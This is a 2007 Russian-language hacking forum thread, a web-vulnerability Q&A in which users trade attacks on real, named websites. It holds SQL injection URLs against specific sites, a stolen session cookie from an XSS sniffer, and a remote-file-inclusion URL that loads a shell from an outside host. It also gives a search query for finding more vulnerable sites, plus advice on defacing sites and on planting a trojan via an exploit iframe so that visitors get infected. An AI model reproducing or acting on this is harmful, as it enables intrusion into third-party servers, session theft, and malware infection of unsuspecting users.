Вернуться   GraBBerZ.CoM - ICQ | Proxy | Бруты | Дедики | Эксплоиты > Underground > ][ack

Ответ
 
Опции темы Опции просмотра

[Web-Уязвимости] Вопрос - ответ
Старый 13.05.2007, 13:34   #1
 
Аватар для d0p3_sh0w
 
d0p3_sh0w вне форума
Регистрация: 09.05.2007
Сообщений: 45
Респекты: 25

[Web-Уязвимости] Вопрос - ответ

В этой теме вы можете задавать любые вопросы по уязвимостям. Если вы нашли где то уязвимость, и не можете ей воспользоваться - вам сюда. По мере возможностей всё будет объяснено/описано.

Запрещается:
-Просьбы в о взломе (Я могу только помочь раскрутить уязвимость, дальше уже сами)
-Сторонние вопросы (уязвимости сторонних протоколов: ICQ, IRC, WAP etc ; вопросы связанные с ОС и серверами)

Запомните, здесь только web!

Любой оффтоп будет удаляться.

UPD. Размещение ссылок на ресурсы ЗАПРЕЩЕНО, в случае нарушения сообщение будет немедленно удаляться. (с) cat1vo
  Ответить с цитированием

Старый 17.05.2007, 03:01   #2
MedVeD
 
Аватар для sato
 
sato вне форума
Регистрация: 23.07.2006
Адрес: UA
Сообщений: 475
Респекты: 494
нашел ссылку на дампер: _http://bc-city.com/dumper.php
данные для конекта, они же логин и пасс к базе, тут: _http://bc-city.com/backup/dumper.cfg.php их есеснах не достать...
бекапы лежат тут: _http://bc-city.com/backup , но имя их не угадать...

вобщем, можно ли как-то обойти это дело и сдампить базу? или скачать уже имеющийся дамп?
  Ответить с цитированием

Старый 18.05.2007, 16:13   #3
 
Аватар для d0p3_sh0w
 
d0p3_sh0w вне форума
Регистрация: 09.05.2007
Сообщений: 45
Респекты: 25
Цитата:
Сообщение от sato
нашел ссылку на дампер: _http://bc-city.com/dumper.php
данные для конекта, они же логин и пасс к базе, тут: _http://bc-city.com/backup/dumper.cfg.php их есеснах не достать...
бекапы лежат тут: _http://bc-city.com/backup , но имя их не угадать...

вобщем, можно ли как-то обойти это дело и сдампить базу? или скачать уже имеющийся дамп?
В Sypex Dumper'e узявимостей нету. Сам форум пропатчен полностью. Пробовал 4 эксплойта, ни один не дал результатов.
  Ответить с цитированием

Старый 14.07.2007, 21:07   #4
bot
 
Аватар для Mr.X
 
Mr.X вне форума
Регистрация: 14.07.2007
Сообщений: 3
Респекты: 0
Цитата:
dope_show . полазил , попробовал что-то сделать.
вот что получилось http://astrol.ru/index.php?page=-1+u...,2,3,4,5,6,7/* , но почему-то mysql.user не фурычит. возможно такое что там немного другая база юзеров? И доуп чо еще можно получить с этого что я сделал? дай примерчик какой-нить.
обновлено :вот еще порыскал и на что напоролся :
http://www.elephant.ru/index.php?pag...3,14,15 ,16/* . Но попробовал
http://www.elephant.ru/index.php?pag...m+mysql.user/* и типо доступа нет. Это специально блочат ? или опять не пральную таблицу юзеров подобрал.
По ссылке все нормально, реально подобрать имена столбцов и залить шелл.
http://www.elephant.ru/index.php?pag...6+FROM+users/*
  Ответить с цитированием

Старый 23.09.2007, 15:18   #5
Гость
 
Аватар для Dreel
 
Сообщений: n/a
Более менее разобрался с xss уязвимостями, нашел сайт с активной xss поставил боевую xss на свой снифер, приходят отчеты вида
Код:
__utma=158419323.602895738.1189776912.1190485822.1190536854.8; __utmz=158419323.1190536854.8.8.utmccn=(referral)|utmcsr=perm.citydom.ru|utmcct=/|utmcmd=referral; PHPSESSID=d0be6881fd3b8f4c7812e1d30f4d39ce; __utmb=158419323; __utmc=158419323; pro=b; b=b; hotlog=1; __utma=79271556.923146399.1189776970.1189860301.1190536863.3; __utmb=79271556; __utmz=79271556.1190536863.3.3.utmccn=(referral)|utmcsr=properm.ru|utmcct=/|utmcmd=referral; __utmc=79271556; pro=b; b=b; hotlog=1
Как эту хрень засунуть в свою куки, помогите пожалуйста...
  Ответить с цитированием

Старый 23.09.2007, 21:26   #6
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
Dreel,
забей , ты впоймал сесию РНР -
Цитата:
PHPSESSID=d0be6881fd3b8f4c7812e1d30f4d39ce
ето нужно действовать сразу пока она действительна, каждый раз при логировании сесия меняеться.
__________________
  Ответить с цитированием

Старый 25.09.2007, 17:11   #7
Гость
 
Аватар для Dreel
 
Сообщений: n/a
Товаристчи! Вопрос про скуль!
d0p3_sh0w писал в видео
Цитата:
Теперь нам надо подобрать таблицу с юзерами, чаще всего встречается таблица mysql.user. Попробуем её.Цифры не исчезли, мы угадали таблицу.
А у меня цифры исчезли... паника... существуют и другие виды таблиц, кто знает предоставьте пожалуйста.

З.Ы. кавырялсо тут
Цитата:
_http://www.uprava.org/section.php?id=-33+union+select+1,2,3,4,5,6,7
Зная активную xss на сайте какую можно еще сделать говняжку, кроме кражи куки и выскакивающего алерта?
  Ответить с цитированием

Старый 03.10.2007, 22:24   #8
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
Dreel,
проверяй переменные на инклуд шела или <*img> тега, а вообще нах чтото выдумывать если можно куки впоймать
__________________
  Ответить с цитированием

Старый 03.10.2007, 22:56   #9
small duck
 
Аватар для tear
 
tear вне форума
Регистрация: 01.08.2006
Сообщений: 470
Респекты: 719
Дайте ссыль на статью где описано как заливать шелл.
Заранее благодарен!
  Ответить с цитированием

Старый 04.10.2007, 00:49   #10
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
Dreel,
Цитата:
Зная активную xss на сайте какую можно еще сделать говняжку, кроме кражи куки и выскакивающего алерта?
Цитата:
Дак нахрена мне куки захалустных сайтов объявлений, или я чтото не догоняю
встречный вопрос: что тогда тебе нужно ? Определись в желаниях Срубил куки - залил шелл, что еще мудрить ?

tear,
Шелл можно залить при помощи sql inj, php inj, а так же украв через xss куки админа и залив шелл через админку, статьи, мануалы, видео - будут написаны, но... чуть позже, извиняюсь за свою некомпетентность но в данный момент личные проблемы возникли, оч мало в сети бываю =\
Вот тебе маленький пример ошибки веб програмирования :
Цитата:
_http://www.ihre-service-agentur.de/stadtnews24/hpmaker/index.php?p=http://fu2reteam.org/rst57shell.txt
нефильтрованая переменная $p указывает на страницу сайта, но не фильтрует каталог сайта что привело к инклуду файла с каталога другого сайта, тобиш шелла . Таких сайтов тьма искать их можно гуглем при помощи команды :
Цитата:
inurl:"index.php?p=" AND inurl:".htm"
ну и таму подобные, вместо ?p - ?page, ?pg и тд.
__________________
  Ответить с цитированием

Старый 04.10.2007, 00:52   #11
[BanneD]
 
Аватар для TrypoED
 
TrypoED вне форума
Регистрация: 05.01.2007
Сообщений: 265
Респекты: 13
Цитата:
Сообщение от tear
Дайте ссыль на статью где описано как заливать шелл.
Заранее благодарен!
Вот ТуТ
Да и вообше что такого тяжелого в залитии шела помойму самое легкое :]
  Ответить с цитированием

Старый 04.10.2007, 19:58   #12
small duck
 
Аватар для tear
 
tear вне форума
Регистрация: 01.08.2006
Сообщений: 470
Респекты: 719
b3,
Я просто в этом ни капли не шарю, а хочется узнать, и дефнуть какой-нибудь сайт

Попытавшись повторить, то что написано в мануале по заливке шелла на хакерок,орг получил вот что:
  Ответить с цитированием

Старый 09.10.2007, 19:25   #13
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
tear,
Могу посоветовать меньше создавать постов и тем с вопросами типа "ПАМАГИТЕ хачу сламать" , и приступить к изучению уязвимостей веб приложений, для начала советую прочитать книгу Тактика защиты и нападения на web-приложения которая у нас имееться в разделе "Книги" . Можно конечно шариться по инету, по форумам читать мануальчики и тд. Но я советую прочитать книгу Потому как к каждому сайту есть свой подход, где-то sql иньекция пробивает, а где-то банальный рнр инклуд, ну и конечно нельзя забывать про XSS так-как ето самая распространенная уязвимость.
__________________
  Ответить с цитированием

Старый 19.10.2007, 20:00   #14
small duck
 
Аватар для tear
 
tear вне форума
Регистрация: 01.08.2006
Сообщений: 470
Респекты: 719
Есть доступ к админке одного сайта, хочу туда всунуть пинча, т.е. люди которые будут заходить на сайт, будут его "славливать" напишите пжлст как?!
  Ответить с цитированием

Старый 19.10.2007, 20:06   #15
Тёмный Дайвер
 
Аватар для NTM
 
NTM вне форума
Регистрация: 12.10.2006
Сообщений: 752
Респекты: 1,739
Цитата:
Есть доступ к админке одного сайта, хочу туда всунуть пинча, т.е. люди которые будут заходить на сайт, будут его "славливать" напишите пжлст как?!
сплоит) на страницу index всунуть ифрейм на сплоит
  Ответить с цитированием
Ответ

Метки
csrf, faq, hackbar, sql, sql injection, xss, вопрос-ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход



Время: 17:06



Powered by vBulletin® Version 3.7.6
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd. Перевод: zCarot